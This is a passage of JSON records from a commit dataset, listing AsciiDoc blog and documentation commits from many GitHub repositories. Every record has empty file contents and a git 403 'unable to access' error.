2016-07-31-How-to-be-more-productive.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-07-31-How-to-be-more-productive.adoc","new_file":"_posts\/2016-07-31-How-to-be-more-productive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb5227057a0d626aae9d34f4c39bf0396f3cf2bf","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/inclojure.adoc","new_file":"content\/events\/2018\/inclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ee803243775978a35c9cb693db10f6efe8d8c6f3","subject":"Partial doc for functor.","message":"Partial doc for functor.\n","repos":"alesguzik\/cats,OlegTheCat\/cats,mccraigmccraig\/cats,funcool\/cats,yurrriq\/cats,tcsavage\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4499ab34dda8584f35b0bbd149f2ff05a6c19fd2","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"589af299d59670668833b72cc53ea9ffa14647fa","subject":"adding some clarifications and testing with the latest CE","message":"adding some clarifications and testing with the latest CE\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d0a7602225c242f7bb0325a7e3bc71711e854e67","subject":"Update 2014-01-03-AssertJ-Neo4j-100-is-out.adoc","message":"Update 2014-01-03-AssertJ-Neo4j-100-is-out.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2014-01-03-AssertJ-Neo4j-100-is-out.adoc","new_file":"_posts\/2014-01-03-AssertJ-Neo4j-100-is-out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf62a847a4098ae1bea00ada51dab324b01eb71f","subject":"Update 2017-09-04-First-steps-with-Flutter.adoc","message":"Update 2017-09-04-First-steps-with-Flutter.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2017-09-04-First-steps-with-Flutter.adoc","new_file":"_posts\/2017-09-04-First-steps-with-Flutter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f089cf6a93d848fad0e705d577c518641ee8b5b1","subject":"y2b create post The World's Smallest Drone!","message":"y2b create post The World's Smallest Drone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-24-The-Worlds-Smallest-Drone.adoc","new_file":"_posts\/2016-08-24-The-Worlds-Smallest-Drone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1213636f360e5dff2da19fa5110ee1b2e4ae8ed","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4100142ede3e60fb4928c9ced48acff3d57ac8f","subject":"Update 2015-08-27-B-Sdes-Las-Vegas-2015.adoc","message":"Update 2015-08-27-B-Sdes-Las-Vegas-2015.adoc","repos":"polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io","old_file":"_posts\/2015-08-27-B-Sdes-Las-Vegas-2015.adoc","new_file":"_posts\/2015-08-27-B-Sdes-Las-Vegas-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polarbill\/polarbill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ec0d30b86fba10bc63d0062374dc42ea07479c6","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b61dc6b4ad078bb200e2d1207fc333715a97f3e","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c911c64ab1ef1c8e9cbf9ae913ea4827d84aad2f","subject":"y2b create post DON'T Buy The iPhone X","message":"y2b create post DON'T Buy The iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-26-DONT-Buy-The-iPhone-X.adoc","new_file":"_posts\/2017-11-26-DONT-Buy-The-iPhone-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3e599130909662b7256b1f763ed1e95e2f13efd","subject":"Update 2015-11-28-Coucou.adoc","message":"Update 2015-11-28-Coucou.adoc","repos":"AntoineTyrex\/antoinetyrex.github.io,AntoineTyrex\/antoinetyrex.github.io,AntoineTyrex\/antoinetyrex.github.io","old_file":"_posts\/2015-11-28-Coucou.adoc","new_file":"_posts\/2015-11-28-Coucou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AntoineTyrex\/antoinetyrex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50378e1c10a7f62e734a661e657d247cac8984f3","subject":"Update 2019-02-16-Citati.adoc","message":"Update 2019-02-16-Citati.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2019-02-16-Citati.adoc","new_file":"_posts\/2019-02-16-Citati.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edfa0e8260841e958e39ce8108e8889ef4626a51","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ec0663d401bf1e10c91ca93e90aa53d89e2bd6f","subject":"adding some placeholders for future improvements","message":"adding some placeholders for future improvements\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66f530355417e809b20cd452b449363fe6b0c060","subject":"Update datamodel-forms.asciidoc (#10350)","message":"Update datamodel-forms.asciidoc (#10350)\n\nThis patch fixes the BinderValidationStatusHandler example in the documentation.","repos":"asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework","old_file":"documentation\/datamodel\/datamodel-forms.asciidoc","new_file":"documentation\/datamodel\/datamodel-forms.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52c2ca610b6f583f5ab2a068240e4f10cc279a9a","subject":"Polish AOP reference documentation","message":"Polish AOP reference documentation\n\n- fix formatting\n- fix syntax\n- use consistent example package name\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b7ee3fd2f365f4c824191e3583cc8137161499c","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1ed789bc5347ead7edd71133c7d220f6980d9e4","subject":"Update 2016-12-01-Salut.adoc","message":"Update 2016-12-01-Salut.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Salut.adoc","new_file":"_posts\/2016-12-01-Salut.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ccbc54dca6fb4c7d144c192b47d0bbf7a29c708","subject":"Blogpost for Alpha4 announcement.","message":"Blogpost for Alpha4 announcement.\n","repos":"ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org","old_file":"news\/2015-08-19-WildFly-Swarm-Alpha4-Released.adoc","new_file":"news\/2015-08-19-WildFly-Swarm-Alpha4-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f9b0444539ddf3e2da55b1205b9ba53f0e8e136","subject":"Minor typo","message":"Minor typo","repos":"mbenson\/spring-cloud-config,mstine\/spring-cloud-config,mbenson\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,royclarkson\/spring-cloud-config,shakuzen\/spring-cloud-config,shakuzen\/spring-cloud-config,marbon87\/spring-cloud-config,rajkumargithub\/spring-cloud-config,royclarkson\/spring-cloud-config,rajkumargithub\/spring-cloud-config,shakuzen\/spring-cloud-config,fangjing828\/spring-cloud-config,psbateman\/spring-cloud-config,appleman\/spring-cloud-config,fkissel\/spring-cloud-config,spring-cloud\/spring-cloud-config,fangjing828\/spring-cloud-config,thomasdarimont\/spring-cloud-config,mstine\/spring-cloud-config,mstine\/spring-cloud-config,thomasdarimont\/spring-cloud-config,appleman\/spring-cloud-config,spring-cloud\/spring-cloud-config,fkissel\/spring-cloud-config,rajkumargithub\/spring-cloud-config,spring-cloud\/spring-cloud-config,fkissel\/spring-cloud-config,psbateman\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config,fangjing828\/spring-cloud-config,marbon87\/spring-cloud-config,royclarkson\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9294e670c29e4016fd29d1ecd9ad86280351ac8","subject":"Update 2018-09-10-Go.adoc","message":"Update 2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acdf1ebd912e8e7642ab36e784235368dcc0e2a8","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da5908f88f7036463120168647d5954f364fac15","subject":"Renamed '_posts\/2016-01-30-My-English-Title.adoc' to '_posts\/2016-01-30-prime.adoc'","message":"Renamed '_posts\/2016-01-30-My-English-Title.adoc' to '_posts\/2016-01-30-prime.adoc'","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-01-30-prime.adoc","new_file":"_posts\/2016-01-30-prime.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8be9f8f3e01701b00691bcb852a1ad4cafc7b02","subject":"Update 2017-09-20-short.adoc","message":"Update 2017-09-20-short.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-09-20-short.adoc","new_file":"_posts\/2017-09-20-short.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f437fc1e9a9a65eb67e163f9c40191bd1a209af1","subject":"Update 2018-05-28-G-A-S.adoc","message":"Update 2018-05-28-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-G-A-S.adoc","new_file":"_posts\/2018-05-28-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecd0313fa1b85832cf3636b6bd7602a08f7211ca","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08889c0ba715beafbfb21499bc96ef998a592956","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"085159453fa30aa3d3681de32f00ce569c30aee4","subject":"Update 2016-10-06-Blockchain-Rebranding-Industries.adoc","message":"Update 2016-10-06-Blockchain-Rebranding-Industries.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-06-Blockchain-Rebranding-Industries.adoc","new_file":"_posts\/2016-10-06-Blockchain-Rebranding-Industries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb0a20d9fedaf31371441a55407c9c88716240b4","subject":"Update 2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","message":"Update 2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","new_file":"_posts\/2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb8160ad9994336d16ddff84f70548889b273908","subject":"adding a readme file for pre-req's etc.","message":"adding a readme file for pre-req's etc.\n","repos":"smartpcr\/hadoop-arch-book,nvoron23\/hadoop-arch-book,hadooparchitecturebook\/hadoop-arch-book,smartpcr\/hadoop-arch-book,hadooparchitecturebook\/hadoop-arch-book,hadooparchitecturebook\/hadoop-arch-book,smartpcr\/hadoop-arch-book,nvoron23\/hadoop-arch-book,nvoron23\/hadoop-arch-book","old_file":"ch11-data-warehousing\/oltp\/README.asciidoc","new_file":"ch11-data-warehousing\/oltp\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smartpcr\/hadoop-arch-book.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12e749f7f6f3271d14ee3386e11f9e435c466cd5","subject":"y2b create post The Power Glove (E3 2014)","message":"y2b create post The Power Glove (E3 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-13-The-Power-Glove-E3-2014.adoc","new_file":"_posts\/2014-06-13-The-Power-Glove-E3-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a93318e46cd442927b03c0404d5d7825cb644b2","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bd71aafa63b647126b1fdaa4f4f828a34c3121f","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd43c81b496a077631c0344c99f0406ae42ca0e0","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e388201c0de8ac45b4af46863af4ea317469ffd6","subject":"Update 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Update 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"_posts\/2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b99ad518cd218885d04d593975ce506a2eeef671","subject":"y2b create post They Sent An Arcade Machine","message":"y2b create post They Sent An Arcade Machine","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-22-They-Sent-An-Arcade-Machine.adoc","new_file":"_posts\/2016-02-22-They-Sent-An-Arcade-Machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"720754599e2edf46cd644067dfb00f64534d92dc","subject":"Update 2016-10-21-2-Treffen-am-21-Oktober.adoc","message":"Update 2016-10-21-2-Treffen-am-21-Oktober.adoc","repos":"creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io","old_file":"_posts\/2016-10-21-2-Treffen-am-21-Oktober.adoc","new_file":"_posts\/2016-10-21-2-Treffen-am-21-Oktober.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/creative-coding-bonn\/creative-coding-bonn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"084fb21f4bf9aaf941450e6788fef208006a05fd","subject":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dce3bf52663f00a15a587b4f667a9104bcafe940","subject":"Update 2017-01-09-MORDERGEWALT-UND-TERRORMACHT.adoc","message":"Update 2017-01-09-MORDERGEWALT-UND-TERRORMACHT.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-09-MORDERGEWALT-UND-TERRORMACHT.adoc","new_file":"_posts\/2017-01-09-MORDERGEWALT-UND-TERRORMACHT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32e47eede58a4f574aeda03bc0d91725e9b094aa","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39e2f053ef918c36d48182120449a61c122af76e","subject":"Update 2017-02-14-Alexa.adoc","message":"Update 2017-02-14-Alexa.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-14-Alexa.adoc","new_file":"_posts\/2017-02-14-Alexa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6442d1f75e2055a240224926d80d9a0801572427","subject":"[Docs] Add link to grok debugger docs (#25412)","message":"[Docs] Add link to grok debugger docs 